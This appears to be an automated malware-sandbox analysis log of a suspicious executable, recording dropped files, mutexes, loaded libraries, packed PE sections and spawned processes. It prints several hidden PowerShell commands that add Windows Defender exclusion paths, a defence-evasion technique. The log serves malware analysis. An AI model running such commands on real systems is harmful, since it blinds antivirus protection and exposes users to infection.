Source: Joe Sandbox ViewDropped File: C:\Reka\rapnewsa.exe 0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: UBONg7lmVR.exe, 00000000.00000000.2036590918.0000000003964000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInstaller Driver.exeB vs UBONg7lmVR.exe
Source: UBONg7lmVR.exe, 00000000.00000002.4505274504.0000000003F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UBONg7lmVR.exe
Source: UBONg7lmVR.exeBinary or memory string: OriginalFilenameInstaller Driver.exeB vs UBONg7lmVR.exe
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Section: /19 ZLIB complexity 0.9991581357758621
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Section: /32 ZLIB complexity 0.9933081454918032
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Section: /65 ZLIB complexity 0.9992535231210021
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Section: /78 ZLIB complexity 0.9908877648782687
Source: classification engineClassification label: mal75.evad.winEXE@26/32@5/6
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeFile created: C:\Users\user\Desktop\new_example.txtJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03
Source: C:\Reka\rapnewsa.exeMutant created: \Sessions\1\BaseNamedObjects\082e2202-17f7-4654-a651-ac9a3778e1d7
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeFile opened: C:\Windows\system32\9335665e35dcdfa9b600c8c491eaf9c739de0f93eee6e36e77c22310897c04a1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
Source: UBONg7lmVR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UBONg7lmVR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Reka\rapnewsa.exeSystem information queried: HandleInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: UBONg7lmVR.exeVirustotal: Detection: 13%
Source: unknownProcess created: C:\Users\user\Desktop\UBONg7lmVR.exe "C:\Users\user\Desktop\UBONg7lmVR.exe"
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exeJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
